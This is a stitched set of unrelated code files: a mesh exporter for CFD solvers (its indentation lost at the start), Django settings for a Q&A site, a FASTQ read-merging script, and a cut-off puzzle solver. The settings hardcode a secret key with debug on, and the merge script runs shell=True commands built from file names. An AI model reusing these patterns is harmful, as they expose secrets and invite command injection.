nb_nodes_in_elements = 2
elements_type = "bar2"
elif types_in_groups == 2: # quadrangles
if help == True:
mesh_file.write("QUAD\n")
element_ids_in_group = quadrangle_ids_in_group
nb_elements_in_group = nb_quadrangles_in_group
nb_nodes_in_elements = 4
elements_type = "quad4"
elif types_in_groups == 1 or types_in_groups == 3: # triangles
if help == True:
mesh_file.write("TRIA\n")
element_ids_in_group = triangle_ids_in_group
nb_elements_in_group = nb_triangles_in_group
nb_nodes_in_elements = 3
types_in_groups -= 1
elements_type = "tria3"
if help == True:
mesh_file.write("N ID NODE1 NODE2 ...\n")
N = 1
amsh_file.write(" '%s'\n"%(elements_type))
amsh_file.write(" bound_elem_nodes IF %i %i 0\n"%(nb_nodes_in_elements, nb_elements_in_group))
node_ids = []
for n in range(nb_nodes_in_elements):
node_ids.append([])
for element_id in element_ids_in_group:
if help == True:
mesh_file.write("%i %i "%(N, element_id))
N += 1
for n in range(nb_nodes_in_elements):
if help == True:
mesh_file.write("%i "%(mesh.GetElemNodes(element_id)[n]))
node_ids[n].append(mesh.GetElemNodes(element_id)[n])
if help == True:
mesh_file.write("\n")
figures = []
for n in range(nb_nodes_in_elements):
figures += node_ids[n]
WriteInColumns(amsh_file, figures, nb_nodes_in_elements, 30)
#-
# Write the domain element definitions
print "[i] Writing definition of domain elements... (%s elements)"%(nb_elements_in_domain)
if help == True:
mesh_file.write("DOMAIN CELLS\n")
triangle_ids_in_domain = []
quadrangle_ids_in_domain = []
tetrahedron_ids_in_domain = []
pyramid_ids_in_domain = []
prism_ids_in_domain = []
hexahedron_ids_in_domain = []
if mesh_dimension == 2:
element_ids_in_domain = face_ids_in_mesh
elif mesh_dimension == 3:
element_ids_in_domain = volume_ids_in_mesh
for element_id_in_domain in element_ids_in_domain:
nb_nodes_in_element = mesh.GetElemNbNodes(element_id_in_domain)
if mesh_dimension == 2:
if nb_nodes_in_element == 3:
triangle_ids_in_domain.append(element_id_in_domain)
if nb_nodes_in_element == 4:
quadrangle_ids_in_domain.append(element_id_in_domain)
elif mesh_dimension == 3:
if nb_nodes_in_element == 4:
tetrahedron_ids_in_domain.append(element_id_in_domain)
if nb_nodes_in_element == 5:
pyramid_ids_in_domain.append(element_id_in_domain)
if nb_nodes_in_element == 6:
prism_ids_in_domain.append(element_id_in_domain)
if nb_nodes_in_element == 8:
hexahedron_ids_in_domain.append(element_id_in_domain)
nb_types_in_domain = 0
types_in_domain = 0 #-2 = quadrangles ; - 1 = triangles ; + 1 = tetrahedrons ; + 2 = pyramids ; + 4 = prisms ; + 8 = hexahedrons
nb_triangles_in_domain = len(triangle_ids_in_domain)
nb_quandrangles_in_domain = len(quadrangle_ids_in_domain)
nb_tetrahedrons_in_domain = len(tetrahedron_ids_in_domain)
nb_pyramids_in_domain = len(pyramid_ids_in_domain)
nb_prisms_in_domain = len(prism_ids_in_domain)
nb_hexahedrons_in_domain = len(hexahedron_ids_in_domain)
if nb_triangles_in_domain > 0:
types_in_domain -= 1
nb_types_in_domain += 1
if nb_quandrangles_in_domain > 0:
types_in_domain -= 2
nb_types_in_domain += 1
if nb_tetrahedrons_in_domain > 0:
types_in_domain += 1
nb_types_in_domain += 1
if nb_pyramids_in_domain > 0:
types_in_domain += 2
nb_types_in_domain += 1
if nb_prisms_in_domain > 0:
types_in_domain += 4
nb_types_in_domain += 1
if nb_hexahedrons_in_domain > 0:
types_in_domain += 8
nb_types_in_domain += 1
types_for_quadrangles = [ - 3, - 2]
types_for_triangles = [ - 3, - 1]
types_for_tetrahedrons = [1, 3, 5, 7, 9, 11, 13, 15]
types_for_pyramids = [2, 3, 6, 7, 10, 11, 14, 15]
types_for_prisms = [4, 5, 6, 7, 12, 13, 14, 15]
types_for_hexahedrons = [8, 9, 10, 11, 12, 13, 14, 15]
for n in range(nb_types_in_domain):
amsh_file.write(" element_group N 0 0 2\n")
amsh_file.write(" element_type L 1 1 0\n")
if types_in_domain in types_for_quadrangles:
if help == True:
mesh_file.write("QUAD\n")
element_ids_in_domain = quadrangle_ids_in_domain
nb_elements_in_domain = nb_quandrangles_in_domain
nb_nodes_in_elements = 4
types_in_domain += 2
elements_type = "quad4"
elif types_in_domain in types_for_triangles:
if help == True:
mesh_file.write("TRIA\n")
element_ids_in_domain = triangle_ids_in_domain
nb_elements_in_domain = nb_triangles_in_domain
nb_nodes_in_elements = 3
types_in_domain += 1
elements_type = "tria3"
elif types_in_domain in types_for_hexahedrons:
if help == True:
mesh_file.write("HEXA\n")
element_ids_in_domain = hexahedron_ids_in_domain
nb_elements_in_domain = nb_hexahedrons_in_domain
nb_nodes_in_elements = 8
types_in_domain -= 8
elements_type = "hexa8"
elif types_in_domain in types_for_prisms:
if help == True:
mesh_file.write("PRISM\n")
element_ids_in_domain = prism_ids_in_domain
nb_elements_in_domain = nb_prisms_in_domain
nb_nodes_in_elements = 6
types_in_domain -= 4
elements_type = "penta6"
elif types_in_domain in types_for_pyramids:
if help == True:
mesh_file.write("PENTA\n")
element_ids_in_domain = pyramid_ids_in_domain
nb_elements_in_domain = nb_pyramids_in_domain
nb_nodes_in_elements = 5
types_in_domain -= 2
elements_type = "penta5"
elif types_in_domain in types_for_tetrahedrons:
if help == True:
mesh_file.write("TETRA\n")
element_ids_in_domain = tetrahedron_ids_in_domain
nb_elements_in_domain = nb_tetrahedrons_in_domain
nb_nodes_in_elements = 4
types_in_domain -= 1
elements_type = "tetra4"
if help == True:
mesh_file.write("N ID NODE1 NODE2 ...\n")
N = 1
amsh_file.write(" '%s'\n"%(elements_type))
amsh_file.write(" element_nodes IF %i %i 0\n"%(nb_nodes_in_elements, nb_elements_in_domain))
node_ids = []
for n in range(nb_nodes_in_elements):
node_ids.append([])
for element_id in element_ids_in_domain:
if help == True:
mesh_file.write("%i %i "%(N, element_id))
N += 1
for n in range(nb_nodes_in_elements):
if help == True:
mesh_file.write("%i "%(mesh.GetElemNodes(element_id)[n]))
node_ids[n].append(mesh.GetElemNodes(element_id)[n])
if help == True:
mesh_file.write("\n")
figures = []
for n in range(nb_nodes_in_elements):
figures += node_ids[n]
if mesh_dimension == 3:
# reorder node IDs
reordered_figures = []
split_figures = []
reordered_split_figures = []
for n in range(nb_nodes_in_elements):
split_figures.append([])
reordered_split_figures.append([])
f = 0
n = 0
for figure in figures:
split_figures[n].append(figure)
f += 1
if f == nb_elements_in_domain:
n += 1
f = 0
if elements_type == "hexa8" or elements_type == "penta6":
for n in range(nb_nodes_in_elements / 2):
reordered_split_figures[n] = split_figures[nb_nodes_in_elements / 2 + n]
reordered_split_figures[nb_nodes_in_elements / 2 + n] = split_figures[n]
for n in range(nb_nodes_in_elements):
reordered_figures += reordered_split_figures[n]
figures = reordered_figures
elif elements_type == "tetra4" or elements_type == "penta5":
for n in range(nb_nodes_in_elements - 1):
reordered_figures += split_figures[nb_nodes_in_elements - 2 - n]
figures = reordered_figures + split_figures[nb_nodes_in_elements - 1]
WriteInColumns(amsh_file, figures, nb_nodes_in_elements, 24)
#-
# Close the files
amsh_file.close()
if help == True:
mesh_file.close()
#-
eaf = ExportAmshFile
def ExportSU2File( mesh = None, file = None, only = [None], ignore = [None]):
    """
    Description:
        Exports a mesh into an .su2 file readable by the CFD solver SU2 4.0.
    Arguments:
        # mesh
            Description:       The mesh to export.
            Type:              Mesh
            GUI selection:     yes
            Selection by name: yes
            Recursive:         -
            Default value:     None
        # file
            Description:       The name without extension of the amsh file to write. If equals None, the name of the mesh in the study tree is taken.
            Type:              String
            GUI selection:     -
            Selection by name: -
            Recursive:         -
            Default value:     None
        # only
            Description:       The list of names of groups to export, excluding the others.
            Type:              List of Strings
            GUI selection:     -
            Selection by name: -
            Recursive:         -
            Default value:     [None]
        # ignore
            Description:       The list of names of groups to ignore.
            Type:              List of Strings
            GUI selection:     -
            Selection by name: -
            Recursive:         -
            Default value:     [None]
    Returned Values:
        "dim" value: -
        "single" value: -
            Type:   -
            Number: -
            Name:   -
    Conditions of use:
        The mesh has to be computed and to contain groups describing the desired boundary conditions (inlet, outlet, wall, farfield, etc.).
    """
    # NOTE(review): Python 2 module (print statements). The [None] mutable
    # defaults are never mutated inside this function, so they are safe here.
    # Get the input shape(s)
    mesh = GetGUISelection(mesh, uniq = True)
    mesh = GetObject(mesh, "SMESH")
    #-
    # Check the input shape existence
    if "error" in [mesh] or None in [mesh]: return
    #-
    else:# All checks done
        # Map (mesh dimension, node count) to the SU2/VTK element type code.
        # With boundary=True the element is a boundary marker element, i.e. it
        # lives in one dimension below the domain.
        def FindElementType(mesh_dimension, nb_nodes_in_element, boundary = False):
            if boundary == True: mesh_dimension -= 1
            line_type = 3
            triangle_type = 5
            quadrilateral_type = 9
            tetrahedral_type = 10
            hexahedral_type = 12
            wedge_type = 13
            pyramid_type = 14
            element_type = None
            if mesh_dimension == 1:
                if nb_nodes_in_element == 2:
                    element_type = line_type
            if mesh_dimension == 2:
                if nb_nodes_in_element == 3:
                    element_type = triangle_type
                if nb_nodes_in_element == 4:
                    element_type = quadrilateral_type
            elif mesh_dimension == 3:
                if nb_nodes_in_element == 4:
                    element_type = tetrahedral_type
                if nb_nodes_in_element == 5:
                    element_type = pyramid_type
                if nb_nodes_in_element == 6:
                    element_type = wedge_type
                if nb_nodes_in_element == 8:
                    element_type = hexahedral_type
            return element_type
        # Decompose a number into (mantissa, exponent) with 1 <= |mantissa| < 10
        # (0 maps to (0.0, 0)); used to write coordinates in scientific notation.
        def powerOfTen(figure):
            figure *= 1.0
            n = 0
            if figure != 0:
                if abs(figure) < 1:
                    while abs(figure) < 1:
                        figure *= 10
                        n -= 1
                if abs(figure) >= 10:
                    while abs(figure) >= 10:
                        figure /= 10
                        n += 1
            return figure, n
        # Wrap raw SMESH objects into a smesh.Mesh; tolerate failures because
        # the object may already be wrapped.
        if "SMESH_Mesh instance" in str(mesh) or "meshProxy instance" in str(mesh) or "Mesh object" in str(mesh):
            try:
                mesh = smesh.Mesh(mesh)
            except:
                pass
        else:
            print "[X] The input object is not a mesh or the Mesh module was not yet loaded."; return
        # Get the mesh name
        mesh_name = mesh.GetName()
        #-
        # Renumber elements and nodes (SU2 expects compact, contiguous ids)
        mesh.RenumberNodes()
        mesh.RenumberElements()
        #-
        # Get nodes number and IDs
        nb_nodes_in_mesh = mesh.NbNodes()
        node_ids_in_mesh = mesh.GetNodesId()
        #-
        # Get edges IDs
        edge_ids_in_mesh = mesh.GetElementsByType(SMESH.EDGE)
        nb_edges_in_mesh = mesh.NbEdges()
        #-
        # Get faces IDs
        face_ids_in_mesh = mesh.GetElementsByType(SMESH.FACE)
        nb_faces_in_mesh = mesh.NbFaces()
        nb_triangles_in_mesh = mesh.NbTriangles()
        nb_quadrangles_in_mesh = mesh.NbQuadrangles()
        #-
        # Get volumes IDs
        nb_volumes_in_mesh = mesh.NbVolumes()
        nb_tetrahedrons_in_mesh = mesh.NbTetras()
        nb_pyramids_in_mesh = mesh.NbPyramids()
        nb_prisms_in_mesh = mesh.NbPrisms()
        nb_hexahedrons_in_mesh = mesh.NbHexas()
        volume_ids_in_mesh = mesh.GetElementsByType(SMESH.VOLUME)
        #-
        # Get mesh dimension: 3D if any volume element exists, else 2D
        if nb_volumes_in_mesh != 0:
            mesh_dimension = 3
            nb_elements_in_domain = nb_volumes_in_mesh
        else:
            mesh_dimension = 2
            nb_elements_in_domain = nb_faces_in_mesh
        #-
        # Get groups
        group_names = mesh.GetGroupNames()
        groups = mesh.GetGroups()
        #-
        # Sort groups: keep the "only" list first, then drop the "ignore" list
        sorted_groups = []
        if only != [None]:
            for group in groups:
                group_name = group.GetName()
                if group_name in only:
                    sorted_groups.append(group)
            groups = sorted_groups
            sorted_groups = []
        if ignore != [None]:
            for group in groups:
                group_name = group.GetName()
                if group_name not in ignore:
                    sorted_groups.append(group)
            groups = sorted_groups
        # Get the number of groups
        nb_groups = len(groups)
        #-
        # Get group types
        group_types = []
        for group in groups:
            group_type = str(group.GetType())
            group_types.append(group_type)
        #-
        # Open the su2 file
        if file == None:
            file = mesh_name
        su2_file = open("%s.su2"%(file), "w")
        su2_file.write("NDIME= %i\n"%(mesh_dimension))
        #-
        # Write the domain element definitions
        print "[i] Writing definition of domain elements... (%s elements)"%(nb_elements_in_domain)
        su2_file.write("NELEM= %i\n"%(nb_elements_in_domain))
        if mesh_dimension == 2:
            element_ids_in_domain = face_ids_in_mesh
        elif mesh_dimension == 3:
            element_ids_in_domain = volume_ids_in_mesh
        for element_id_in_domain in element_ids_in_domain:
            nb_nodes_in_element = mesh.GetElemNbNodes(element_id_in_domain)
            element_type = FindElementType(mesh_dimension, nb_nodes_in_element)
            element_definition = str(element_type)
            for n in range(nb_nodes_in_element):
                #if element_type == pyramid_type: n *= -1
                node_id = mesh.GetElemNodes(element_id_in_domain)[n]
                # SU2 node indices are 0-based; SMESH ids start at 1
                node_id -= 1
                element_definition += "\t" + str(node_id)
            element_definition += "\t" + str(element_id_in_domain)
            su2_file.write(element_definition + "\n")
        #-
        print "[i] Writing node coordinates... (%s nodes)"%(nb_nodes_in_mesh)
        su2_file.write("NPOIN= %i\n"%(nb_nodes_in_mesh))
        # Write the node coordinates in "mantissaE exponent" scientific form
        for node_id in node_ids_in_mesh:
            node_definition = ""
            for n in range(mesh_dimension):
                node_coordinate = mesh.GetNodeXYZ(node_id)[n]
                [node_float_coordinate, node_coordinate_power_of_ten] = powerOfTen(node_coordinate)
                node_coordinate = "%.16fE%i"%(node_float_coordinate, node_coordinate_power_of_ten)
                node_definition += "\t" + node_coordinate
            # 0-based node index trailing each coordinate line
            node_id -= 1
            node_definition += "\t" + str(node_id)
            su2_file.write(node_definition + "\n")
        #-
        # Get the group element definition (one MARKER per mesh group)
        print "[i] Writing definition of group elements... (%s groups)"%(nb_groups)
        su2_file.write("NMARK= %i\n"%(nb_groups))
        for group in groups:# For each group of the mesh
            group_name = group.GetName()
            su2_file.write("MARKER_TAG= %s\n"%(group_name))
            element_ids_in_group = group.GetListOfID()
            nb_elements_in_group = len(element_ids_in_group)
            su2_file.write("MARKER_ELEMS= %s\n"%(nb_elements_in_group))
            for element_id_in_group in element_ids_in_group:
                nb_nodes_in_element = mesh.GetElemNbNodes(element_id_in_group)
                element_type = FindElementType(mesh_dimension, nb_nodes_in_element, boundary = True)
                element_definition = str(element_type)
                for n in range(nb_nodes_in_element):
                    node_id = mesh.GetElemNodes(element_id_in_group)[n]
                    node_id -= 1
                    element_definition += "\t" + str(node_id)
                #element_definition += "\t" + str(element_id_in_group)
                su2_file.write(element_definition + "\n")
        #-
        # Close the files
        su2_file.close()
        #-
esf = ExportSU2File
#### - ####
# Module banner printed when the file is loaded (Python 2 print statements).
print "Welcome in cfdmsh!"
# NOTE(review): pv() is defined elsewhere in this file -- presumably prints
# the cfdmsh version; confirm before relying on it.
pv()
print "Type pdf() to see implemented functions."
|
"""
Django settings for hitchike project.
Generated by 'django-admin startproject' using Django 1.9.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'xs9lba(58-&bz**m%ye9t46h47if6)7fs8f^2_qpt)6fse=7ir'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['localhost', '127.0.0.1', 'hitchike.too.gy', 'hitchike']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
# Vendors
'django_mathjax',
'hitcount',
'taggit',
'vote',
'pagedown',
# Apps
'qa',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'hitchike.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
BASE_DIR + '/templates',
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'hitchike.wsgi.application'
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Paris'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# AUTHENTICATION
LOGIN_REDIRECT_URL = '/'
LOGOUT_REDIRECT_URL = '/'
# REGISTRATION
ACCOUNT_ACTIVATION_DAYS = 7
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = '/home/static/hitchike/'
STATICFILES_DIRS = (
BASE_DIR + '/static',
)
MEDIA_URL = '/media/'
MEDIA_ROOT = '/home/media/hitchike/'
MATHJAX_ENABLED=True
MATHJAX_CONFIG_FILE = "TeX-AMS-MML_HTMLorMML"
MATHJAX_CONFIG_DATA = {
"tex2jax": {
"inlineMath": [ ['$','$'], ['\\(','\\)'] ],
},
"showMathMenu": False,
}
PAGEDOWN_WIDGET_TEMPLATE = 'qa/editor_widget.html'
PAGEDOWN_WIDGET_CSS = ('css/editor_widget.css',)
ALLOWED_DOMAINS = ['epita.fr', 'lrde.epita.fr', 'lse.epita.fr']
|
<gh_stars>0
#!/usr/bin/env python
"""
File Name : combine_reads_MB.py
Author : <NAME>, <EMAIL>
Created On : 2016-03-28
Last Modified: 2016-03-28
Description : This program will combine read files of the same sample
obtained from multiple sequencing runs
Dependencies:
Usage: combine_reads_MB.py [-h] [-v] [-i INPUT_FILE] [-d SEQ_DIR]
[-o OUTPUT_DIR] [-m MIN_READCNT] [-x MAX_READCNT]
[-r TOTAL_READCNT] [-w]
CHANGE LOG:
TODO:
"""
# Python imports
import os, operator, sys, time, re, logging, argparse, subprocess, glob
import logging.handlers
from collections import defaultdict
# Version
VERSION = "1.0"
# Logger configuration and setup: everything goes to a rotating file
# (zz_mergeReads.log, 2 MB per file, up to 20 backups) at DEBUG level.
LEVEL = logging.DEBUG
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
logger = logging.getLogger(__file__)
logger.setLevel(LEVEL)
handler = logging.handlers.RotatingFileHandler('zz_mergeReads.log', maxBytes=2000000, backupCount=20)
handler.setLevel(LEVEL)
handler.setFormatter(formatter)
logger.addHandler(handler)
def main(argv):
    """Combine per-run FASTQ files of each sample into one file pair.

    Reads a tab-separated sample sheet (lab number, sequencing id, read
    count), sums read counts per sample over runs whose count exceeds
    min_readcnt, and for samples reaching total_readcnt concatenates their
    forward/reverse FASTQ files into the output directory. Writes three
    report files (r01/r02/r03) in the current directory.
    NOTE(review): Python 2 script (dict.iteritems, print-style formatting).
    """
    logger.info("STARTED PIPELINE!!")
    parser = argparse.ArgumentParser(prog = 'combine_reads_MB.py', description = "A program to combine reads of a sample from multiple sequencing runs")
    parser.add_argument('-v','--version', action = 'version', version = "%(prog)s v" + str(VERSION))
    parser.add_argument('-i', '--ifile', dest='input_file', help="input file containing sample ids")
    parser.add_argument('-d', '--seqdir', dest='seq_dir', help="path to sequence directory")
    parser.add_argument('-o','--outdir', dest='output_dir', help="Name of an output directory")
    parser.add_argument('-m','--min_readcnt', dest='min_readcnt', help="Enter minimum reads to consider while merging files")
    parser.add_argument('-x', '--max_readcnt', dest='max_readcnt', help="Maximun number of reads per sample")
    parser.add_argument('-r','--total_readcnt', dest='total_readcnt', help="Enter total read count you want to keep in the output directory")
    parser.add_argument('-w','--overwrite', action='store_true', default='False', help="overwrite, if the output files exists")
    args = parser.parse_args()
    # check to see that input file is provided
    if not args.input_file:
        logger.exception("You must provide input file containing sample ids.")
        parser.exit(status=1, message="You must provide input file containing sample ids\n\n")
    else:
        input_file = args.input_file
    if not args.output_dir:
        # Default output directory: <input basename>_out under the CWD
        outputdirname = os.path.splitext(os.path.basename(input_file))[0] + "_out"
        output_dir = os.path.join(os.getcwd(), outputdirname)
        logger.warning("Output directory is not provided. Writing the result to {} " . format(output_dir))
    else:
        output_dir = os.path.realpath(args.output_dir)
    if not args.seq_dir:
        logger.exception("You must provide path to directory that contains sequences or metaphlan output")
        parser.exit(status=1, message="You must provide path to sequence directory\n")
    else:
        seq_dir = os.path.realpath(args.seq_dir)
    # Thresholds fall back to pipeline defaults when not supplied
    if not args.min_readcnt:
        min_readcnt = 100000
    else:
        min_readcnt = int(args.min_readcnt)
    if not args.max_readcnt:
        max_readcnt = 5000000
    else:
        max_readcnt = int(args.max_readcnt)
    if not args.total_readcnt:
        readcnt_tomerge = 4000000
    else:
        readcnt_tomerge = int(args.total_readcnt)
    # Report-file suffix expresses the merge threshold in millions, e.g. "4.0M.txt"
    readcnt_millions = str(readcnt_tomerge/float(1000000))
    #print "readcnt in millions {}".format(str(readcnt_millions))
    file_suffix = str(readcnt_millions + 'M.txt')
    try:
        if not os.path.isdir(output_dir): subprocess.check_call(['mkdir', output_dir])
        datadict = read_inputfile(input_file)
        sample_stat = {}
        #logger.info("data = {}".format(str(datadict)))
        # r01: all samples; r02: samples at/above threshold; r03: below threshold
        fh1 = open('r01_combined.txt', 'w')
        fh2 = open('r02_sampleids_gt' + str(file_suffix), 'w')
        fh3 = open('r03_sampleids_lt' + str(file_suffix), 'w')
        fh1.write('#SampleLabNumber\tSampleSeqID\tReadCnt\n')
        fh2.write('#SampleLabNumber\tSampleSeqID\tReadCnt\n')
        fh3.write('#SampleLabNumber\tSampleSeqID\tReadCnt\n')
        for id, data in datadict.iteritems():
            total_cnt = 0;
            seqids = ""
            #logger.info("id = " + str(id))
            # Keep only runs whose individual read count clears min_readcnt
            for seqid, readcnt in data.iteritems():
                if int(readcnt) > int(min_readcnt):
                    total_cnt += int(readcnt)
                    seqids += str(seqid) + ";"
            #total_cnt = sum(int(v) for v in data.values() if int(v) > 100000)
            #seqids = ";".join([str(x) for x in data.keys() if data[x] > 100000])
            if len(seqids):
                seqids = seqids.rstrip(';')
                fh1.write(id + '\t' + seqids + '\t' + str(total_cnt) + '\n')
                if total_cnt >= int(readcnt_tomerge):
                    seqid_list = seqids.split(';')
                    participant_id = seqid_list[0].split('_')[0]
                    sample_id = str(participant_id + "_" + seqid_list[0].split('_')[1])
                    fw_cmd = ''
                    rv_cmd = ''
                    if len(seqid_list) > 1:
                        # Multiple runs: concatenate all FW (and RV) files into *_COMB_* outputs
                        fw_file = ''
                        rv_file = ''
                        for seqid in seqid_list:
                            fw_file += os.path.join(seq_dir, str(seqid + '_FW_CLEAN.fastq')) + ' '
                            rv_file += os.path.join(seq_dir, str(seqid + '_RV_CLEAN.fastq')) + ' '
                        fw_outfile = os.path.join(output_dir, str(sample_id + '_COMB_FW_CLEAN.fastq'))
                        rv_outfile = os.path.join(output_dir, str(sample_id + '_COMB_RV_CLEAN.fastq'))
                        fh2.write(str(id) + '\t' + str(sample_id +'_COMB') + '\t' + str(total_cnt) + '\n')
                    else:
                        # Single run: copy the pair through unchanged
                        fw_file = ''
                        rv_file = ''
                        fw_file = os.path.join(seq_dir, str(seqid_list[0] + '_FW_CLEAN.fastq'))
                        rv_file = os.path.join(seq_dir, str(seqid_list[0] + '_RV_CLEAN.fastq'))
                        fw_outfile = os.path.join(output_dir, str(seqid_list[0] + '_FW_CLEAN.fastq'))
                        rv_outfile = os.path.join(output_dir, str(seqid_list[0] + '_RV_CLEAN.fastq'))
                        fh2.write(str(id) + '\t' + str(seqid_list[0]) + '\t' + str(total_cnt) + '\n')
                    # Skip samples whose output already exists (no --overwrite handling here)
                    if not os.path.isfile(fw_outfile):
                        # NOTE(review): shell=True with file names interpolated into
                        # the command string -- safe only while ids contain no shell
                        # metacharacters; confirm input sanitization upstream.
                        fw_cmd = 'cat {} > {}'.format(fw_file, fw_outfile)
                        rv_cmd = 'cat {} > {}'.format(rv_file, rv_outfile)
                        logger.debug("fw_cmd = {} and rv_cmd = {}".format(fw_cmd, rv_cmd))
                    if fw_cmd and rv_cmd:
                        proc1 = subprocess.Popen(fw_cmd, shell=True, stdout = subprocess.PIPE, stderr=subprocess.STDOUT)
                        output1 = proc1.communicate()[0].strip()
                        proc2 = subprocess.Popen(rv_cmd, shell=True, stdout = subprocess.PIPE, stderr=subprocess.STDOUT)
                        output2 = proc2.communicate()[0].strip()
                        #pass
                else:
                    fh3.write(id + '\t' + seqids + '\t' + str(total_cnt) + '\n')
            #if int(total_cnt) > int(max_readcnt):
            #    logger.info("id => {} has more than {} reads".format(str(id), str(max_readcnt)))
        fh1.close()
        fh2.close()
        fh3.close()
    except:
        # Broad catch at the pipeline boundary: log with traceback and abort
        logger.exception("Error Occurred")
        sys.exit(1)
    logger.info("End of pipeline!!")
def read_inputfile(filename):
    """Parse the tab-separated sample sheet into a nested mapping.

    Each non-comment line is ``lab_number<TAB>seq_id<TAB>read_count``;
    thousands separators (commas) in the count are stripped.

    Returns:
        defaultdict: {lab_number: {seq_id: read_count (int)}}
    Exits:
        status 1 if the file is empty, 2 if it cannot be stat'ed.
    """
    logger.info("Reading input file: " + filename)
    sample_info = defaultdict(dict)
    try:
        s = os.stat(filename)
        if s.st_size == 0:
            logger.exception("Error Occurred! The file {} is empty".format(filename))
            sys.exit(1)
    except OSError as e:
        logger.exception("Error Occurred: " + str(e))
        sys.exit(2)
    # BUGFIX: use a context manager so the handle is closed even if a
    # malformed line makes the comprehension raise (the old open/close pair
    # leaked the descriptor on error).
    with open(filename, "r") as fh:
        data = [line.rstrip('\n').split("\t") for line in fh if not line.startswith('#')]
    #logger.debug("data = {}".format(str(data)))
    for item in data:
        sample_info[item[0]][item[1]] = int(item[2].replace(',', ''))
    logger.info("IDs: {}".format(str(len(sample_info))))
    return sample_info
####################################################################
# Script entry point: forward command-line arguments (minus argv[0]) to main.
if __name__ == '__main__':
    main(sys.argv[1:])
|
from collections import defaultdict, Counter, deque
from functools import cache
from itertools import product, pairwise
from multiprocessing import Pool
import math
import re
# Pre-compiled pattern matching runs of non-digit characters.
# NOTE(review): unused in this chunk -- presumably a shared parsing helper
# kept for other puzzle days; confirm before removing.
non_digits = re.compile('[^0-9]+')
def sign(a, b, step=1):
    """Return *step* carrying the sign of the direction from a toward b."""
    delta = b - a
    return int(math.copysign(step, delta))
def autorange(a, b, step=1):
    """Inclusive range walking from a to b in |step| increments.

    Degenerate case a == b yields the one-element tuple (a,), matching the
    original behaviour; otherwise a range object is returned.
    """
    if a == b:
        return (a,)
    # Inlined sign(): step magnitude with the direction of travel.
    stride = int(math.copysign(step, b - a))
    return range(a, b + stride, stride)
def inp_to_ranges(xy_strs):
    """Parse target-area fragments like 'x=20..30,' into inclusive ranges.

    Each fragment has its surrounding ',xy=' characters stripped, then the
    'lo..hi' bounds become range(lo, hi + 1).
    """
    ranges = []
    for fragment in xy_strs:
        lo, hi = (int(part) for part in fragment.strip(',xy=').split('..'))
        ranges.append(range(lo, hi + 1))
    return ranges
def d17(inp, sample=False):
    """Solve the trick-shot probe puzzle (Advent of Code 2021, day 17 style).

    Simulates every candidate launch velocity (xv, yv) against the target
    rectangle parsed from *inp* ("target area: x=a..b, y=c..d").
    Returns (p1, p2): the highest apex reached by any hitting shot, and the
    number of distinct initial velocities that hit the target.
    """
    p1, p2 = None, 0
    # Drop the "target" and "area:" words; parse the x=/y= fragments.
    _, _, *xy_strs = inp.split()
    x_range, y_range = inp_to_ranges(xy_strs)
    p1 = y_range.start
    for ixv in range(0, x_range.stop+1):
        # An initial x velocity whose total drift ixv*(ixv+1)/2 cannot reach
        # the near edge can never hit -- skip it.
        if ixv * (ixv+1) < x_range.start * 2:
            continue
        for iyv in range(y_range.start, -y_range.start):
            x, y = 0, 0
            xv, yv = ixv, iyv
            # Step the probe until it falls below or overshoots the target.
            while y > y_range.start and x < x_range.stop:
                x += xv
                y += yv
                xv = max(0, xv - 1)  # drag: x velocity decays toward 0
                yv -= 1              # gravity
                if x in x_range and y in y_range:
                    p2 += 1
                    # Apex of a shot launched upward at iyv is triangular(iyv).
                    p1 = max(p1, iyv * (iyv + 1) // 2)
                    break
    return p1, p2
def validate_test(case_id, inp=None, want_p1=None, want_p2=None):
    """Run the solver on a sample case and assert expected answers.

    Returns (True, checked_p1, checked_p2); a mismatch raises AssertionError
    before the return is reached.
    """
    got_p1, got_p2 = d17(inp, sample=True)
    do_p1 = want_p1 is not None
    do_p2 = want_p2 is not None
    if do_p1:
        assert want_p1 == got_p1, f"{case_id=} p1:\n\t{want_p1=}\n\t{got_p1=}"
    if do_p2:
        assert want_p2 == got_p2, f"{case_id=} p2:\n\t{want_p2=}\n\t{got_p2=}"
    return True, do_p1, do_p2
def main():
